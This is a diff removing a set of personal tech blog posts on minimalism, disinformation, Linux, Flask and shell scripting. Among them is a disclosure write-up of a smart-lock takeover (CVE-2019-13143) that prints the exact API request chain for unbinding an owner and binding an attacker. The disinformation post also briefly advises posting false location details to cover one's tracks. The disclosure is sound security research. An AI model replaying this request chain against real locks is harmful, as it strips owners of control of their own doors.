- 05 October, 2019 - -Thoughts on digital minimalism - -Put that screen down! - - Ah yes, yet another article on the internet on this beaten to death - subject. But this is inherently different, since it's my opinion on the - matter, and my technique(s) to achieve "digital minimalism". - - According to me, minimalism can be achieved on two primary fronts -- - the phone & the computer. Let's start with the phone. The daily carry. - The device that's on our person from when we get out of bed, till we - get back in bed. - -The phone - - I've read about a lot of methods people employ to curb their phone - usage. Some have tried grouping "distracting" apps into a separate - folder, and this supposedly helps reduce their usage. Now, I fail to - see how this would work, but YMMV. Another technique I see often is - using a time governance app -- like OnePlus' Zen Mode---to enforce how - much time you spend using specific apps, or the phone itself. I've - tried this for myself, but I constantly found myself counting down the - minutes after which the phone would become usable again. Not helpful. - - My solution to this is a lot more brutal. I straight up uninstalled the - apps that I found myself using too often. There's a simple principle - behind it -- if the app has a desktop alternative, like Twitter, - Reddit, etc. use that instead. Here's a list of apps that got nuked - from my phone: - * Twitter - * Instagram (an exception, no desktop client) - * Relay for Reddit - * YouTube (disabled, ships with stock OOS) - - The only non-productive app that I've let remain is Clover, a 4chan - client. I didn't find myself using it as much earlier, but we'll see - how that holds up. I've also allowed my personal messaging apps to - remain, since removing those would be inconveniencing others. - - I must admit, I often find myself reaching for my phone out of habit - just to check Twitter, only to find that its gone. I also - subconsciously tap the place where its icon used to exist (now replaced - with my mail client) on my launcher. The only "fun" thing left on my - phone to do is read or listen to music. Which is okay, in my opinion. - -The computer - - I didn't do anything too nutty here, and most of the minimalism is - mostly aesthetic. I like UIs that get out of the way. - - My setup right now is just a simple bar at the top showing the time, - date, current volume and battery %, along with my workspace indicators. - No fancy colors, no flashy buttons and sliders. And that's it. I don't - try to force myself to not use stuff -- after all, I've reduced it - elsewhere. :) - - Now the question arises: Is this just a phase, or will I stick to it? - What's going to stop me from heading over to the Play Store and - installing those apps back? Well, I never said this was going to be - easy. There's definitely some will power needed to pull this off. I - guess time will tell.
@@ -1,190 +0,0 @@
- 10 September, 2019 - -Disinformation demystified - -Misinformation, but deliberate - - As with the disambiguation of any word, let's start with its etymology - and definiton. According to [1]Wikipedia, disinformation has been - borrowed from the Russian word -- dezinformatisya (dezinforma'ciya), - derived from the title of a KGB black propaganda department. - - Disinformation is false information spread deliberately to deceive. - - To fully understand disinformation, especially in the modern age, we - need to understand the key factors of any successful disinformation - operation: - * creating disinformation (what) - * the motivation behind the op, or its end goal (why) - * the medium used to disperse the falsified information (how) - * the actor (who) - - At the end, we'll also look at how you can use disinformation - techniques to maintain OPSEC. - - In order to break monotony, I will also be using the terms "information - operation", or the shortened forms -- "info op" & "disinfo". - -Creating disinformation - - Crafting or creating disinformation is by no means a trivial task. - Often, the quality of any disinformation sample is a huge indicator of - the level of sophistication of the actor involved, i.e. is it a 12 year - old troll or a nation state? - - Well crafted disinformation always has one primary characteristic -- - "plausibility". The disinfo must sound reasonable. It must induce the - notion it's likely true. To achieve this, the target -- be it an - individual, a specific demographic or an entire nation -- must be well - researched. A deep understanding of the target's culture, history, - geography and psychology is required. It also needs circumstantial and - situational awareness, of the target. - - There are many forms of disinformation. A few common ones are staged - videos / photographs, recontextualized videos / photographs, blog - posts, news articles & most recently -- deepfakes. - - Here's a tweet from [2]the grugq, showing a case of recontextualized - imagery: - - Disinformation. - The content of the photo is not fake. The reality of what it - captured is fake. The context it's placed in is fake. The picture - itself is 100% authentic. Everything, except the photo itself, is - fake. - Recontextualisation as threat vector. [3]pic.twitter.com/Pko3f0xkXC - — thaddeus e. grugq (@thegrugq) [4]June 23, 2019 - -Motivations behind an information operation - - I like to broadly categorize any info op as either proactive or - reactive. Proactively, disinformation is spread with the desire to - influence the target either before or during the occurence of an event. - This is especially observed during elections.^[5]1 In offensive - information operations, the target's psychological state can be - affected by spreading fear, uncertainty & doubt, or FUD for short. - - Reactive disinformation is when the actor, usually a nation state in - this case, screws up and wants to cover their tracks. A fitting example - of this is the case of Malaysian Airlines Flight 17 (MH17), which was - shot down while flying over eastern Ukraine. This tragic incident has - been attributed to Russian-backed separatists.^[6]2 Russian media is - known to have desseminated a number of alternative & some even - conspiratorial theories^[7]3, in response. The number grew as the JIT's - (Dutch-lead Joint Investigation Team) investigations pointed towards - the separatists. The idea was to muddle the information space with - these theories, and as a result, potentially correct information takes - a credibility hit. - - Another motive for an info op is to control the narrative. This is - often seen in use in totalitarian regimes; when the government decides - what the media portrays to the masses. The ongoing Hong Kong protests - is a good example.^[8]4 According to [9]NPR: - - Official state media pin the blame for protests on the "black hand" - of foreign interference, namely from the United States, and what - they have called criminal Hong Kong thugs. A popular conspiracy - theory posits the CIA incited and funded the Hong Kong protesters, - who are demanding an end to an extradition bill with China and the - ability to elect their own leader. Fueling this theory, China Daily, - a state newspaper geared toward a younger, more cosmopolitan - audience, this week linked to a video purportedly showing Hong Kong - protesters using American-made grenade launchers to combat police. - ... - -Media used to disperse disinfo - - As seen in the above example of totalitarian governments, national TV - and newspaper agencies play a key role in influence ops en masse. It - guarantees outreach due to the channel/paper's popularity. - - Twitter is another, obvious example. Due to the ease of creating - accounts and the ability to generate activity programmatically via the - API, Twitter bots are the go-to choice today for info ops. Essentially, - an actor attempts to create "discussions" amongst "users" (read: bots), - to push their narrative(s). Twitter also provides analytics for every - tweet, enabling actors to get realtime insights into what sticks and - what doesn't. The use of Twitter was seen during the previously - discussed MH17 case, where Russia employed its troll factory -- the - [10]Internet Research Agency (IRA) to create discussions about - alternative theories. - - In India, disinformation is often spread via YouTube, WhatsApp and - Facebook. Political parties actively invest in creating group chats to - spread political messages and memes. These parties have volunteers - whose sole job is to sit and forward messages. Apart from political - propaganda, WhatsApp finds itself as a medium of fake news. In most - cases, this is disinformation without a motive, or the motive is hard - to determine simply because the source is impossible to trace, lost in - forwards.^[11]5 This is a difficult problem to combat, especially given - the nature of the target audience. - -The actors behind disinfo campaigns - - I doubt this requires further elaboration, but in short: - * nation states and their intelligence agencies - * governments, political parties - * other non/quasi-governmental groups - * trolls - - This essentially sums up the what, why, how and who of disinformation. - -Personal OPSEC - - This is a fun one. Now, it's common knowledge that STFU is the best - policy. But sometimes, this might not be possible, because afterall - inactivity leads to suspicion, and suspicion leads to scrutiny. Which - might lead to your OPSEC being compromised. So if you really have to, - you can feign activity using disinformation. For example, pick a place, - and throw in subtle details pertaining to the weather, local events or - regional politics of that place into your disinfo. Assuming this is - Twitter, you can tweet stuff like: - * "Ugh, when will this hot streak end?!" - * "Traffic wonky because of the Mardi Gras parade." - * "Woah, XYZ place is nice! Especially the fountains by ABC street." - - Of course, if you're a nobody on Twitter (like me), this is a non-issue - for you. - - And please, don't do this: - - mcafee opsecfail - -Conclusion - - The ability to influence someone's decisions/thought process in just - one tweet is scary. There is no simple way to combat disinformation. - Social media is hard to control. Just like anything else in cyber, this - too is an endless battle between social media corps and motivated - actors. - - A huge shoutout to Bellingcat for their extensive research in this - field, and for helping folks see the truth in a post-truth world. - __________________________________________________________________ - - 1. [12]This episode of CYBER talks about election influence ops - (features the grugq!). - 2. The [13]Bellingcat Podcast's season one covers the MH17 - investigation in detail. - 3. [14]Wikipedia section on MH17 conspiracy theories - 4. [15]Chinese newspaper spreading disinfo - 5. Use an adblocker before clicking [16]this. - -References - - 1. https://en.wikipedia.org/wiki/Disinformation - 2. https://twitter.com/thegrugq - 3. https://t.co/Pko3f0xkXC - 4. https://twitter.com/thegrugq/status/1142759819020890113?ref_src=twsrc%5Etfw - 5. https://icyphox.sh/home/icy/leet/site/build/blog/disinfo/temp.html#fn:1 - 6. https://icyphox.sh/home/icy/leet/site/build/blog/disinfo/temp.html#fn:2 - 7. https://icyphox.sh/home/icy/leet/site/build/blog/disinfo/temp.html#fn:3 - 8. https://icyphox.sh/home/icy/leet/site/build/blog/disinfo/temp.html#fn:4 - 9. https://www.npr.org/2019/08/14/751039100/china-state-media-present-distorted-version-of-hong-kong-protests - 10. https://en.wikipedia.org/wiki/Internet_Research_Agency - 11. https://icyphox.sh/home/icy/leet/site/build/blog/disinfo/temp.html#fn:5 - 12. https://www.vice.com/en_us/article/ev3zmk/an-expert-explains-the-many-ways-our-elections-can-be-hacked - 13. https://www.bellingcat.com/category/resources/podcasts/ - 14. https://en.wikipedia.org/wiki/Malaysia_Airlines_Flight_17#Conspiracy_theories - 15. https://twitter.com/gdead/status/1171032265629032450 - 16. https://www.news18.com/news/tech/fake-whatsapp-message-of-child-kidnaps-causing-mob-violence-in-madhya-pradesh-2252015.html
@@ -1,69 +0,0 @@
- 21 June, 2020 - -You don't need news - -My hot 'n' spicy take on "news" today - - News -- the never ending feed of information pertaining to "current - events", politics, trivia, and other equally useless junk. News today - is literally just this: "<big name person> did/said <dumb - thing>!", "<group> protests against <bad thing>!", and - so on. Okay, shit's going on in this world. Another day, another thing - to be $FEELING about. - - Now here's a question for you: do you remember what news you consumed - yesterday? The day before? Last week? Heck no! Maybe some major - headlines, but really, what did you gain from learning that - information? Must've been interesting to read at that time. Hence, - news, by virtue of its "newness", is given importance -- and get this, - it isn't even important enough for you to bother remembering it for a - few days. - - News is entertainment. Quick gratification that lasts a day, at max. - -actionable news - - So what is useful news, then? I think I'll go out on a limb here, and - say "anything that is actionable". By that I mean anything that you can - physically affect / information that you can actually put to use. - Again, there are probably edge-cases and this isn't a rule that fits - all, but it's a decent principle to follow. - - As an example, to readers living outside of the US, news regarding - police brutality & the Black Lives Matter movement are unactionable. - I'm not saying those problems don't exist or don't matter, but what are - you really doing to help the cause? Sending thoughts and prayers? - Posting angrily on Instagram? Tweeting about it? Stop, and think for - yourself if these things actually make any difference. Your time might - be better invested in doing something else. - -other problems - - There are other, more concerning problems with modern news -- it is no - longer purely objective. The sad state of news / reporting today is - it's inherently biased. I mean political bias, of course. All news is - either left-leaning or right-leaning, and narratives are developed to - fit their political stance. This is essentially propaganda. Today's - news is propaganda. If anything, this should be reason enough to avoid - it. - -but I compare multiple sources! - - Okay, so you read the same thing written by CNN, BBC, The New York - Times, etc.? Do you realize how much time you wasted doing this? - Ultimately to what end -- to forget about it by the next day, and do it - all over again. What a dull, braindead process. - -won't I be ignorant then? - - If you think keeping up with current events makes you intellectually - superior somehow...boy are you wrong. Do something that actually - stimulates your gray matter. But, here's the thing, if the "news" is - big enough, you're bound to come across it anyway! You might hear your - friend discuss it, or see it on Twitter, so on and so forth. How you - process it thereafter is what matters. - - Give it a thought. Imagine if all that social media, news, and general - internet noise didn't clog your head. I think it'll be much nicer. You - might not, and that's okay. Mail your thoughts or @ me on the fedi -- - I'd like to hear them.
@@ -1,64 +0,0 @@
- 22 August, 2020 - -The Ducky One 2 SF - -I fell for the mechanical keyboard meme - - Thanks to the pandemic yada yada I've been working from home (and - attending college from home), and I figured my WFH setup could use an - upgrade. Unfortunately, the choices for mechanical keyboards in India - are fairly limited. All imports from China don't get through, and - imports from elsewhere have a fat duty slapped on it -- sometimes up to - 300%^[1]1. It's obscene! - - The only reliable source I've found (and folks on [2]r/mkindia will - concur), is [3]Meckeys. They aren't particularly abundant in variety, - but there's some decent prebuilts that you can pick up on there -- and - I copped the Ducky One 2 SF. - - Ducky One 2 SF side view - - It's a 65% board, so unlike standard 60% boards, this comes with arrow - keys and the Del, PgUp and PgDn keys. I don't really need the arrow - keys, but they do come handy on the occasion -- like scrolling, for - example. Since this board lacks the function row, the Esc and the ~ - keys are merged. I have to hit Shift + Esc for tilde (same action as - usual), and Fn + Esc for the backtick. Takes a bit of relearning, but - it's manageable. - - Ducky One 2 SF top-down view - - The key switches I went with were the Cherry MX Speed Silvers -- like - Reds but actuate a bit faster. As it's my first ever mechanical - keyboard, I don't really have anything to compare it against. It feels - great, but it was pretty jarring initially because even the slightest - touch (with the palm for instance), would cause a key to actuate, - leading to typos. Again, just a matter of getting accustomed to it; all - smooth sailing after. Why did I pick the Speed Silvers? The other - switch options were out of stock. - - That said, I think I really quite like linear switches. They're not too - noisy, and they feel just right. I haven't noticed any great - improvement in my typing speeds though -- I still maintain an average - of 90-100 WPM. - - The One 2 SF is fully RGB, i.e. each key is individually lit. Not that - I make big use it. I have it set to plain white, and only light up - under the key I'm currently pressing. Yes, this also makes it - incredibly easy for people to shoulder-peek your passwords. I certainly - won't be using it outside home. - - The keyboard itself cost 9599 INR, which is about 128 USD. Meckeys took - exactly 10 days to ship it (3rd Aug - 13th Aug). Overall, it's a lovely - keyboard, and I cannot type on my laptop's low-travel chiclet-style - keyboard, again. There's just no going back. - __________________________________________________________________ - - 1. [4]Reddit link - -References - - 1. https://icyphox.sh/home/icy/leet/site/build/blog/ducky-one-2/temp.html#fn:1 - 2. https://reddit.com/r/mkindia - 3. https://meckeys.com/ - 4. https://www.reddit.com/r/mkindia/comments/hzyoof/i_see_many_spreading_misinformation_about_import/
@@ -1,86 +0,0 @@
- 11 May, 2020 - -The efficacy of deepfakes - -Can we really write it off as "not a threat"? - - A few days back, NPR put out an article discussing why deepfakes aren't - all that powerful in spreading disinformation. [1]Link to article. - - According to the article: - - "We've already passed the stage at which they would have been most - effective," said Keir Giles, a Russia specialist with the Conflict - Studies Research Centre in the United Kingdom. "They're the dog that - never barked." - - I agree. This might be the case when it comes to Russian influence. - There are simpler, more cost-effective ways to conduct [2]active - measures, like memes. Besides, America already has the infrastructure - in place to combat influence ops, and have been doing so for a while - now. - - However, there are certain demographics whose governments may not have - the capability to identify and perform damage control when a - disinformation campaign hits, let alone deepfakes. An example of this - demographic: India. - -the Indian landscape - - The disinformation problem in India is way more sophisticated, and - harder to combat than in the West. There are a couple of reasons for - this: - * The infrastructure for fake news already exists: WhatsApp - * Fact checking media in 22 different languages is non-trivial - - India has had a long-standing problem with misinformation. The 2019 - elections, the recent CAA controversy and even more recently -- the - coronavirus. In some cases, it has even lead to [3]mob violence. - - All of this shows that the populace is easily influenced, and deepfakes - are only going to simplify this. What's worse is explaining to a rural - crowd that something like a deepfake can exist -- comprehension and - adoption of technology has always been slow in India, and can be - attributed to socio-economic factors. - - There also exists a majority of the population that's already been - influenced to a certain degree: the right wing. A deepfake of a Muslim - leader trashing Hinduism will be eaten up instantly. They are inclined - to believe it is true, by virtue of prior influence and given the - present circumstances. - -countering deepfakes - - The thing about deepfakes is the tech to spot them already exists. In - fact, some can even be eyeballed. Deepfake imagery tends to have weird - artifacting, which can be noticed upon closer inspection. Deepfake - videos, of people specifically, blink / move weirdly. The problem at - hand, however, is the general public cannot be expected to notice these - at a quick glance, and the task of proving a fake is left to - researchers and fact checkers. - - Further, India does not have the infrastructure to combat deepfakes at - scale. By the time a research group / think tank catches wind of it, - the damage is likely already done. Besides, disseminating contradictory - information, i.e. "this video is fake", is also a task of its own. - Public opinion has already been swayed, and the brain dislikes - contradictions. - -why haven't we seen it yet? - - Creating a deepfake isn't trivial. Rather, creating a convincing one - isn't. I would also assume that most political propaganda outlets are - just large social media operations. They lack the technical prowess and - / or the funding to produce a deepfake. This doesn't mean they can't - ever. - - It goes without saying, but this post isn't specific to India. I'd say - other countries with a similar socio-economic status are in a similar - predicament. Don't write off deepfakes as a non-issue just because - America did. - -References - - 1. https://www.npr.org/2020/05/07/851689645/why-fake-video-audio-may-not-be-as-powerful-in-spreading-disinformation-as-feare - 2. https://en.wikipedia.org/wiki/Active_measures - 3. https://www.npr.org/2018/07/18/629731693/fake-news-turns-deadly-in-india
@@ -1,197 +0,0 @@
- 05 August, 2019 - -Picking the FB50 smart lock (CVE-2019-13143) - -... and lessons learnt in IoT security - - (originally posted at [1]SecureLayer7's Blog, with my edits) - -The lock - - The lock in question is the FB50 smart lock, manufactured by Shenzhen - Dragon Brother Technology Co. Ltd. This lock is sold under multiple - brands across many ecommerce sites, and has over, an estimated, 15k+ - users. - - The lock pairs to a phone via Bluetooth, and requires the OKLOK app - from the Play/App Store to function. The app requires the user to - create an account before further functionality is available. It also - facilitates configuring the fingerprint, and unlocking from a range via - Bluetooth. - - We had two primary attack surfaces we decided to tackle -- Bluetooth - (BLE) and the Android app. - -Via Bluetooth Low Energy (BLE) - - Android phones have the ability to capture Bluetooth (HCI) traffic - which can be enabled under Developer Options under Settings. We made - around 4 "unlocks" from the Android phone, as seen in the screenshot. - - wireshark packets - - This is the value sent in the Write request: - - wireshark write req - - We attempted replaying these requests using gattool and gattacker, but - that didn't pan out, since the value being written was encrypted.^[2]1 - -Via the Android app - - Reversing the app using jd-gui, apktool and dex2jar didn't get us too - far since most of it was obfuscated. Why bother when there exists an - easier approach -- BurpSuite. - - We captured and played around with a bunch of requests and responses, - and finally arrived at a working exploit chain. - -The exploit - - The entire exploit is a 4 step process consisting of authenticated HTTP - requests: - 1. Using the lock's MAC (obtained via a simple Bluetooth scan in the - vicinity), get the barcode and lock ID - 2. Using the barcode, fetch the user ID - 3. Using the lock ID and user ID, unbind the user from the lock - 4. Provide a new name, attacker's user ID and the MAC to bind the - attacker to the lock - - This is what it looks like, in essence (personal info redacted). - -Request 1 - -POST /oklock/lock/queryDevice -{"mac":"XX:XX:XX:XX:XX:XX"} - - Response: -{ - "result":{ - "alarm":0, - "barcode":"<BARCODE>", - "chipType":"1", - "createAt":"2019-05-14 09:32:23.0", - "deviceId":"", - "electricity":"95", - "firmwareVersion":"2.3", - "gsmVersion":"", - "id":<LOCK ID>, - "isLock":0, - "lockKey":"69,59,58,0,26,6,67,90,73,46,20,84,31,82,42,95", - "lockPwd":"000000", - "mac":"XX:XX:XX:XX:XX:XX", - "name":"lock", - "radioName":"BlueFPL", - "type":0 - }, - "status":"2000" -} - -Request 2 - -POST /oklock/lock/getDeviceInfo - -{"barcode":"https://app.oklok.com.cn/app.html?id=<BARCODE>"} - - Response: - "result":{ - "account":"email@some.website", - "alarm":0, - "barcode":"<BARCODE>", - "chipType":"1", - "createAt":"2019-05-14 09:32:23.0", - "deviceId":"", - "electricity":"95", - "firmwareVersion":"2.3", - "gsmVersion":"", - "id":<LOCK ID>, - "isLock":0, - "lockKey":"69,59,58,0,26,6,67,90,73,46,20,84,31,82,42,95", - "lockPwd":"000000", - "mac":"XX:XX:XX:XX:XX:XX", - "name":"lock", - "radioName":"BlueFPL", - "type":0, - "userId":<USER ID> - } - -Request 3 - -POST /oklock/lock/unbind - -{"lockId":"<LOCK ID>","userId":<USER ID>} - -Request 4 - -POST /oklock/lock/bind - -{"name":"newname","userId":<USER ID>,"mac":"XX:XX:XX:XX:XX:XX"} - -That's it! (& the scary stuff) - - You should have the lock transferred to your account. The severity of - this issue lies in the fact that the original owner completely loses - access to their lock. They can't even "rebind" to get it back, since - the current owner (the attacker) needs to authorize that. - - To add to that, roughly 15,000 user accounts' info are exposed via - IDOR. Ilja, a cool dude I met on Telegram, noticed locks named - "carlock", "garage", "MainDoor", etc.^[3]2 This is terrifying. - - shudders - -Proof of Concept - - [4]PoC Video - - [5]Exploit code - -Disclosure timeline - - * 26th June, 2019: Issue discovered at SecureLayer7, Pune - * 27th June, 2019: Vendor notified about the issue - * 2nd July, 2019: CVE-2019-13143 reserved - * No response from vendor - * 2nd August 2019: Public disclosure - -Lessons learnt - - DO NOT. Ever. Buy. A smart lock. You're better off with the "dumb" ones - with keys. With the IoT plague spreading, it brings in a large attack - surface to things that were otherwise "unhackable" (try hacking a - "dumb" toaster). - - The IoT security scene is rife with bugs from over 10 years ago, like - executable stack segments^[6]3, hardcoded keys, and poor development - practices in general. - - Our existing threat models and scenarios have to be updated to factor - in these new exploitation possibilities. This also broadens the playing - field for cyber warfare and mass surveillance campaigns. - -Researcher info - - This research was done at [7]SecureLayer7, Pune, IN by: - * Anirudh Oppiliappan (me) - * S. Raghav Pillai ([8]@_vologue) - * Shubham Chougule ([9]@shubhamtc) - __________________________________________________________________ - - 1. [10]This article discusses a similar smart lock, but they broke the - encryption. - 2. Thanks to Ilja Shaposhnikov (@drakylar). - 3. [11]PDF - -References - - 1. http://blog.securelayer7.net/fb50-smart-lock-vulnerability-disclosure - 2. https://icyphox.sh/home/icy/leet/site/build/blog/fb50/temp.html#fn:1 - 3. https://icyphox.sh/home/icy/leet/site/build/blog/fb50/temp.html#fn:2 - 4. https://twitter.com/icyphox/status/1158396372778807296 - 5. https://github.com/icyphox/pwnfb50 - 6. https://icyphox.sh/home/icy/leet/site/build/blog/fb50/temp.html#fn:3 - 7. https://securelayer7.net/ - 8. https://twitter.com/_vologue - 9. https://twitter.com/shubhamtc - 10. https://www.pentestpartners.com/security-blog/pwning-the-nokelock-api/ - 11. https://gsec.hitb.org/materials/sg2015/whitepapers/Lyon%20Yang%20-%20Advanced%20SOHO%20Router%20Exploitation.pdf
@@ -1,144 +0,0 @@
- 13 January, 2020 - -Five days in a TTY - -I installed KISS Linux - - This new semester has been pretty easy on me, so far. I hardly every - have any classes (again, so far), and I've a ton of free time on my - hands. This calls for -- yep---a distro hop! - -Why KISS? - - [1]KISS has been making rounds on the interwebz lately.^[2]1 The Hacker - News post spurred quite the discussion. But then again, that is to be - expected from Valleybros who use macOS all day. :^) - - From the website, - - An independent Linux distribution with a focus on simplicity and - the concept of "less is more". The distribution targets only the - x86-64 architecture and the English language. - - Like many people did in the HN thread, "simplicity" here is not to be - confused with "ease". It is instead, simplicity in terms of lesser and - cleaner code -- no [3]Poetterware. - - This, I can get behind. A clean system with less code is like a clean - table. It's nice to work on. It also implies security to a certain - extent since there's a smaller attack surface. - - The [4]kiss package manager is written is pure POSIX sh, and does just - enough. Packages are compiled from source and kiss automatically - performs dependency resolution. Creating packages is ridiculously easy - too. - - Speaking of packages, all packages -- both official & community repos - -- are run through shellcheck before getting merged. This is awesome; I - don't think this is done in any other distro. - - In essence, KISS sucks less. - -Installing KISS - - The [5]install guide is very easy to follow. Clear instructions that - make it hard to screw up; that didn't stop me from doing so, however. - -Day 1 - - Although technically not in a TTY, it was still not in the KISS system - -- I'll count it. I'd compiled the kernel in the chroot and decided to - use efibootmgr instead of GRUB. efibootmgr is a neat tool to modify the - Intel Extensible Firmware Interface (EFI). Essentially, you boot the - .efi directly as opposed to choosing which boot entry you want to boot, - through GRUB. Useful if you have just one OS on the system. Removes one - layer of abstraction. - - Adding a new EFI entry is pretty easy. For me, the command was: -efibootmgr --create - --disk /dev/nvme0n1 \ - --part 1 \ - --label KISS Linux \ - --loader /vmlinuz - --unicode 'root=/dev/nvme0n1p3 rw' # kernel parameters - - Mind you, this didn't work the first time, or the second, or the third - ... a bunch of trial and error (and asking on #kisslinux) later, it - worked. - - Well, it booted, but not into KISS. Took a while to figure out that the - culprit was CONFIG_BLK_DEV_NVME not having been set in the kernel - config. Rebuild & reboot later, I was in. - -Day 2 - - Networking! How fun. An ip a and I see that both USB tethering - (ethernet) and wireless don't work. Great. Dug around a bit -- missing - wireless drivers was the problem. Found my driver, a binary .ucode from - Intel (eugh!). The whole day was spent in figuring out why the kernel - would never load the firmware. I tried different variations -- loading - it as a module (=m), baking it in (=y) but no luck. - -Day 3 - - I then tried Alpine's kernel config but that was so huge and had a ton - of modules and took far too long to build each time, much to my - annoyance. Diffing their config and mine was about ~3000 lines! Too - much to sift through. On a whim, I decided to scrap my entire KISS - install and start afresh. - - For some odd reason, after doing the exact same things I'd done - earlier, my wireless worked this time. Ethernet didn't, and still - doesn't, but that's ok. - - Building xorg-server was next, which took about an hour, mostly thanks - to spotty internet. The build went through fine, though what wasn't was - no input after starting X. Adding my user to the input group wasn't - enough. The culprit this time was a missing xf86-xorg-input package. - Installing that gave me my mouse back, but not the keyboard! - - It was definitely not the kernel this time, because I had a working - keyboard in the TTY. - -Day 4 & Day 5 - - This was probably the most annoying of all, since the fix was trivial. - By this point I had exhausted all ideas, so I decided to build my - essential packages and setup my system. Building Firefox took nearly 9 - hours, the other stuff were much faster. - - I was still chatting on IRC during this, trying to zero down on what - the problem could be. And then: -<dylanaraps> For starters I think st fails due to no fonts. - - Holy shit! Fonts. I hadn't installed any fonts. Which is why none of - the applications I tried launching via sowm ever launched, and hence, I - was lead to believe my keyboard was dead. - -Worth it? - - Absolutely. I cannot stress on how much of a learning experience this - was. Also a test of my patience and perseverance, but yeah ok. I also - think that this distro is my endgame (yeah, right), probably because - other distros will be nothing short of disappointing, in one way or - another. - - Huge thanks to the folks at #kisslinux on Freenode for helping me - throughout. And I mean, they really did. We chatted for hours on end - trying to debug my issues. - - I'll now conclude with an obligatory screenshot. - - scrot - __________________________________________________________________ - - 1. [6]https://news.ycombinator.com/item?id=21021396 - -References - - 1. https://getkiss.org/ - 2. https://icyphox.sh/home/icy/leet/site/build/blog/five-days-tty/temp.html#fn:hn - 3. https://www.urbandictionary.com/define.php?term=poetterware - 4. https://github.com/kisslinux/kiss - 5. https://getkiss.org/pages/install - 6. https://news.ycombinator.com/item?id=21021396
@@ -1,108 +0,0 @@
- 24 June, 2020 - -Flask-JWT-Extended Flask-Login - -Apparently I do webshit now - - For the past few months, I've been working on building a backend for - $STARTUP, with a bunch of friends. I'll probably write in detail about - it when we launch our beta. The backend is your bog standard REST API, - built on Flask -- if you didn't guess from the title already. - - Our existing codebase heavily relies on [1]Flask-Login; it offers some - pretty neat interfaces for dealing with users and their states. - However, its default mode of operation -- sessions -- don't really fit - into a Flask app that's really just an API. It's not optimal. Besides, - this is what [2]JWTs were built for. - - I won't bother delving deep into JSON web tokens, but the general flow - is like so: - * client logs in via say /login - * a unique token is sent in the response - * each subsequent request authenticated request is sent with the - token - - The neat thing about tokens is you can store stuff in them -- "claims", - as they're called. - -returning an access_token to the client - - The access_token is sent to the client upon login. The idea is simple, - perform your usual checks (username / password etc.) and login the user - via flask_login.login_user. Generate an access token using - flask_jwt_extended.create_access_token, store your user identity in it - (and other claims) and return it to the user in your 200 response. - - Here's the excerpt from our codebase. -access_token = create_access_token(identity=email) -login_user(user, remember=request.json["remember"]) -return good("Logged in successfully!", access_token=access_token) - - But, for login_user to work, we need to setup a custom user loader to - pull out the identity from the request and return the user object. - -defining a custom user loader in Flask-Login - - By default, Flask-Login handles user loading via the user_loader - decorator, which should return a user object. However, since we want to - pull a user object from the incoming request (the token contains it), - we'll have to write a custom user loader via the request_loader - decorator. -# Checks the 'Authorization' header by default. -app.config["JWT_TOKEN_LOCATION"] = ["json"] - -# Defaults to 'identity', but the spec prefers 'sub'. -app.config["JWT_IDENTITY_CLAIM"] = "sub" - -@login.request_loader -def load_person_from_request(request): - try: - token = request.json["access_token"] - except Exception: - return None - data = decode_token(token) - # this can be your 'User' class - person = PersonSignup.query.filter_by(email=data["sub"]).first() - if person: - return person - return None - - There's just one mildly annoying thing to deal with, though. - Flask-Login insists on setting a session cookie. We will have to - disable this behaviour ourselves. And the best part? There's no - documentation for this -- well there is, but it's incomplete and points - to deprecated functions. - -disabling Flask-Login's session cookie - - To do this, we define a custom session interface, like so: -from flask.sessions import SecureCookieSessionInterface -from flask import g -from flask_login import user_loaded_from_request - -@user_loaded_from_request.connect -def user_loaded_from_request(app, user=None): - g.login_via_request = True - - -class CustomSessionInterface(SecureCookieSessionInterface): - def should_set_cookie(self, *args, **kwargs): - return False - - def save_session(self, *args, **kwargs): - if g.get("login_via_request"): - return - return super(CustomSessionInterface, self).save_session(*args, **kwargs) - - -app.session_interface = CustomSessionInterface() - - In essence, this checks the global store g for login_via_request and - and doesn't set a cookie in that case. I've submitted a PR upstream for - this to be included in the docs ([3]#514). - -References - - 1. https://flask-login.readthedocs.io/ - 2. https://jwt.io/ - 3. https://github.com/maxcountryman/flask-login/pull/514
@@ -1,168 +0,0 @@
- 24 October, 2019 - -Hacky scripts - -The most fun way to learn to code - - As a CS student, I see a lot of people around me doing courses online - to learn to code. Don't get me wrong -- it probably works for some. - Everyone learns differently. But that's only going to get you so far. - Great you know the syntax, you can solve some competitive programming - problems, but that's not quite enough, is it? The actual learning comes - from applying it in solving actual problems -- not made up ones. (inb4 - some seething CP bro comes at me) - - Now, what's an actual problem? Some might define it as real world - problems that people out there face, and solving it probably requires - building a product. This is what you see in hackathons, generally. - - If you ask me, however, I like to define it as problems that you - yourself face. This could be anything. Heck, it might not even be a - "problem". It could just be an itch that you want to scratch. And this - is where hacky scripts come in. Unclear? Let me illustrate with a few - examples. - -Now playing status in my bar - - If you weren't aware already -- I rice my desktop. A lot. And a part of - this cohesive experience I try to create involves a status bar up at - the top of my screen, showing the time, date, volume and battery - statuses etc. - - So here's the "problem". I wanted to have my currently playing song - (Spotify), show up on my bar. How did I approach this? A few ideas - popped up in my head: - * Send playerctl's STDOUT into my bar - * Write a Python script to query Spotify's API - * Write a Python/shell script to query Last.fm's API - - The first approach bombed instantly. playerctl didn't recognize my - Spotify client and whined about some dbus issues to top it off. I spent - a while in that rabbit hole but eventually gave up. - - My next avenue was the Spotify Web API. One look at the [1]docs and I - realize that I'll have to make more than one request to fetch the - artist and track details. Nope, I need this to work fast. - - Last resort -- Last.fm's API. Spolier alert, this worked. Also, - arguably the best choice, since it shows the track status regardless of - where the music is being played. Here's the script in its entirety: -#!/usr/bin/env bash -# now playing -# requires the last.fm API key - -source ~/.lastfm # `export API_KEY="<key>"` -fg="$(xres color15)" -light="$(xres color8)" - -USER="icyphox" -URL="http://ws.audioscrobbler.com/2.0/?method=user.getrecenttracks" -URL+="&user=$USER&api_key=$API_KEY&format=json&limit=1&nowplaying=true" -NOTPLAYING=" " # I like to have it show nothing -RES=$(curl -s $URL) -NOWPLAYING=$(jq '.recenttracks.track[0]."@attr".nowplaying' <<< "$RES" | tr -d ' -"') - - -if [[ "$NOWPLAYING" = "true" ]] -then - TRACK=$(jq '.recenttracks.track[0].name' <<< "$RES" | tr -d '"') - ARTIST=$(jq '.recenttracks.track[0].artist."#text"' <<< "$RES" | tr -d ' -"') - echo -ne "%{F$light}$TRACK %{F$fg}by $ARTIST" -else - echo -ne "$NOTPLAYING" -fi - - The source command is used to fetch the API key which I store at - ~/.lastfm. The fg and light variables can be ignored, they're only for - coloring output on my bar. The rest is fairly trivial and just involves - JSON parsing with [2]jq. That's it! It's so small, but I learnt a 